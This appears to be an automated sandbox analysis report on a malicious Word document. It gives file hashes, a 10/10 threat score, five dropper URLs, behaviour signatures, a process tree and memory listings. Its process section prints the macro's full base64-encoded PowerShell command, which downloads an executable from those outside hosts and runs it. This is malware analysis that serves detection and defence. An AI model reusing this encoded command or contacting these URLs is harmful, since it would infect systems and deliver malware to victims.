Analysis

  • max time kernel
    101s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-09-2024 06:05

General

  • Target

    d9c0ca384edc8b0e4fb7422745d7664b_JaffaCakes118.doc

  • Size

    272KB

  • MD5

    d9c0ca384edc8b0e4fb7422745d7664b

  • SHA1

    6040aa1c8c9717951b84f0a34274fb7035040ea9

  • SHA256

    0cd62b03d38d473ad2d63129e6768b0ce4e78669e2d7c982fc1d4f118927c1a0

  • SHA512

    2938fd97f35917f65fdae260544e79421c8c58bd611dd61c8c92f06f5beaba4e98154250ab4f5d372fd7b521939c204f6ee18aab854de3acded0c96206ec62b0

  • SSDEEP

    3072:Holv4ePMtnCBKZckiM0nkg4A/x1YPAkjL/xSu90OoiLuDKZXfwKeljR17:JLttifn74U2PASxUOmD+XfwLH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://darktowergaming.com/OEWdo9qt

exe.dropper

http://manhphu.xyz/kRMM9axO1e

exe.dropper

http://actron.com.my/WnSslvdQG

exe.dropper

http://nankaimpa.org/JXzfwPjXB

exe.dropper

http://www.doorlife.co.in/g11m6lr

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d9c0ca384edc8b0e4fb7422745d7664b_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -e JABaADAAbwAyAHEAaQA9ACgAJwBzADcAJwArACcAcwBMAE4AQQAnACsAJwBpACcAKQA7ACQAUABqAGsAMwBYAGsASAA4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGgATQByAHYAYwBtAEcAPQAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwBkAGEAcgBrACcAKwAnAHQAbwB3AGUAcgBnAGEAJwArACcAbQBpACcAKwAnAG4AZwAnACsAJwAuACcAKwAnAGMAbwBtAC8ATwBFAFcAZABvADkAJwArACcAcQB0AEAAaAB0AHQAcAA6AC8ALwBtAGEAbgAnACsAJwBoAHAAaAB1AC4AeAB5AHoALwBrAFIATQAnACsAJwBNADkAYQB4AE8AMQAnACsAJwBlAEAAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8ALwAnACsAJwBhAGMAdAByAG8AJwArACcAbgAuAGMAbwBtACcAKwAnAC4AbQAnACsAJwB5AC8AJwArACcAVwAnACsAJwBuAFMAcwBsAHYAZABRAEcAQABoAHQAdABwADoALwAvAG4AYQBuAGsAYQAnACsAJwBpAG0AJwArACcAcAAnACsAJwBhAC4AbwAnACsAJwByAGcALwBKAFgAJwArACcAegBmAHcAUABqACcAKwAnAFgAQgAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAvAC8AdwB3ACcAKwAnAHcALgBkAG8AbwAnACsAJwByAGwAaQAnACsAJwBmAGUALgBjACcAKwAnAG8ALgAnACsAJwBpAG4ALwBnADEAMQBtACcAKwAnADYAJwArACcAbAAnACsAJwByACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAHAATABiAGoATQBqAEsAOAA9ACgAJwBJADkAJwArACcASAAnACsAJwBUAGMANQBXACcAKQA7ACQAaQA2AEwARwAwAEMAVgAgAD0AIAAoACcAOAA5ACcAKwAnADEAJwApADsAJABIAGkAbABmAEIAbwBTAGoAPQAoACcAdgAnACsAJwBuAGkAQgBPAEoARAAnACkAOwAkAHoATABLAE0AbQBmAE8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGkANgBMAEcAMABDAFYAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAEcAVwB3AFkAbwBYACAAaQBuACAAJABoAE0AcgB2AGMAbQBHACkAewB0AHIAeQB7ACQAUABqAGsAMwBYAGsASAA4AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUARwBXAHcAWQBvAFgALAAgACQAegBMAEsATQBtAGYATwApADsAJABZAGQANABLADUAaAA9ACgAJwBqAFAAUgAyAEgAagBuACcAKwAnAHoAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAegBMAEsATQBtAGYATwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHoATABLAE0AbQBmAE8AOwAkAHcAaQBoAE8AbABpAEkAPQAoACcAVwBHACcAKwAnAEYAUwAyAG4AJwArACcAbAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATQBUAHIAOABaADYAcAA9ACgAJwBhAHoARwAnACsAJwA2AE0AJwArACcANQAnACkAOwA=
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1844

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDC46D.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2cfnwslq.mki.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

    Filesize

    1KB

    MD5

    d22226dba06c0cda01fcb52a51834c61

    SHA1

    2a6c7279f3bd0205f6ec2fd4c19ffb05304d8756

    SHA256

    8f1e49c5c384d5a18a789f0ed624d940b33d000d64dda0d82f977bd9298c9584

    SHA512

    41fd64ac327cd221488ac84367f6010ee7b45750d6565654a0e5d9e51c928109c055b233a5452972d4193ee6c71e3b268882abfeb2f8d9dd0816eb648f26150b

  • memory/1844-48-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/1844-65-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/1844-58-0x00000204F2370000-0x00000204F2392000-memory.dmp

    Filesize

    136KB

  • memory/4492-13-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-45-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-14-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-15-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-3-0x00007FF857FAD000-0x00007FF857FAE000-memory.dmp

    Filesize

    4KB

  • memory/4492-12-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-11-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-8-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-7-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-6-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-16-0x00007FF815C40000-0x00007FF815C50000-memory.dmp

    Filesize

    64KB

  • memory/4492-18-0x00007FF815C40000-0x00007FF815C50000-memory.dmp

    Filesize

    64KB

  • memory/4492-17-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-21-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-20-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-19-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-40-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-9-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-46-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-47-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-10-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-5-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-1-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-62-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-2-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-66-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-67-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-0-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-76-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB

  • memory/4492-4-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-214-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-215-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-217-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-216-0x00007FF817F90000-0x00007FF817FA0000-memory.dmp

    Filesize

    64KB

  • memory/4492-218-0x00007FF857F10000-0x00007FF858105000-memory.dmp

    Filesize

    2.0MB